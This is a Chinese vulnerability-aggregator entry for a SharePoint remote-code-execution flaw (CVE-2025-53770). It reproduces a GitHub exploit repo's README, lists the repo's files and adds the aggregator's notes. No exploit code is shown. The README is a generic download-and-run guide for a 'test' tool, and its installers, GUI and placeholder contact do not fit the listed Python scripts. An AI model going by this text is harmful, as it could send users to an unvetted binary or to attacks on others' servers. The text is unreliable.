POC详情: 5c7fce18356cc17890d82c0f25415a71202f7c63

来源
关联漏洞
标题: Microsoft SharePoint Server 安全漏洞 (CVE-2025-53770)
描述:Microsoft SharePoint Server是美国微软(Microsoft)公司的一款协作平台。 Microsoft SharePoint Server存在安全漏洞,该漏洞源于反序列化不受信任数据,可能导致远程代码执行。
描述
🛠️ Exploit Microsoft SharePoint WebPart Injection vulnerabilities for .NET deserialization and remote code execution using ToolPane.aspx.
介绍
# 🛠️ CVE-2025-53770-Exploit - Simplified SharePoint Injection Exploit Tool

[![Download CVE-2025-53770-Exploit](https://img.shields.io/badge/Download-CVE--2025--53770--Exploit-brightgreen)](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases)

## 🚀 Getting Started

Welcome to the CVE-2025-53770-Exploit project. This tool helps users test SharePoint applications for specific vulnerabilities easily. Follow the steps below to download and install the software.

## 📥 Download & Install

To get started with CVE-2025-53770-Exploit, you need to visit the page below to download the application:

[Visit the Releases Page to Download](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases)

1. Click on the link above.
2. On the Releases page, look for the latest version of the software.
3. Select the appropriate version for your operating system (Windows, Mac, or Linux).
4. Click the download link to save the file to your computer.

## 💻 System Requirements

Ensure your system meets the following requirements to run CVE-2025-53770-Exploit:

- Operating System: Windows 10 or higher, MacOS Sierra or higher, Linux (latest version preferred).
- Processor: Intel or AMD with a minimum of dual-core.
- RAM: At least 4GB.
- Disk Space: 100MB of free space for installation.
- Internet connection for downloading the application and updates.

## ⚙️ Installation Instructions

Once you have downloaded the file, follow these steps to install the application:

### For Windows

1. Locate the downloaded file (usually in the Downloads folder).
2. Double-click the installer file to start the installation.
3. Follow the on-screen prompts to complete the installation.
4. Once the installation is finished, you can find the application in your Start Menu.

### For Mac

1. Open the downloaded file (usually a `.dmg` file).
2. Drag the CVE-2025-53770-Exploit icon into the Applications folder.
3. Open your Applications folder and double-click the CVE-2025-53770-Exploit icon to launch the application.

### For Linux

1. Open your terminal.
2. Navigate to the location where the file is downloaded.
3. Use the command `chmod +x CVE-2025-53770-Exploit` to make the file executable.
4. Run the application using `./CVE-2025-53770-Exploit`.

## 🛡️ Using CVE-2025-53770-Exploit

After installation, follow these steps to use the tool effectively:

1. Launch CVE-2025-53770-Exploit from your applications menu or desktop.
2. Enter the URL of the SharePoint site you would like to test in the designated field.
3. Click the "Start Test" button to initiate the scan.
4. Wait while the application analyzes the site for vulnerabilities related to the CVE-2025-53770 exploit.
5. Review the results displayed in the application.

## 📝 Important Notes

- Please use this tool responsibly and only on websites you own or have explicit permission to test. Unauthorized testing can be illegal and unethical.
- The results are meant for educational and security improvement purposes only. Always consult with a professional before taking any action based on the results.

## 📞 Support

If you encounter any issues or have questions, please reach out to the support team:

- Email: support@example.com (replace with appropriate contact)
- GitHub Issues: Report problems directly on this repository using the Issues tab.

## 📅 Changelog

For detailed information about updates and changes, visit our [Changelog](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases) on the Releases page. Regular updates will improve security and functionality.

## 🌟 Community Contributions

We welcome contributions from everyone. If you would like to improve this project or report issues, feel free to contribute through pull requests or submit issues directly on this repository. 

Thank you for choosing CVE-2025-53770-Exploit! Your security begins here. 

[Download CVE-2025-53770-Exploit](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases)
文件快照

[4.0K] /data/pocs/5c7fce18356cc17890d82c0f25415a71202f7c63 ├── [ 300] compress.py ├── [5.8K] exploit.py ├── [3.9K] README.md ├── [ 120] requirements.txt └── [4.0K] YSLosf ├── [2.2K] Program.cs └── [ 368] YSLosf.csproj 1 directory, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。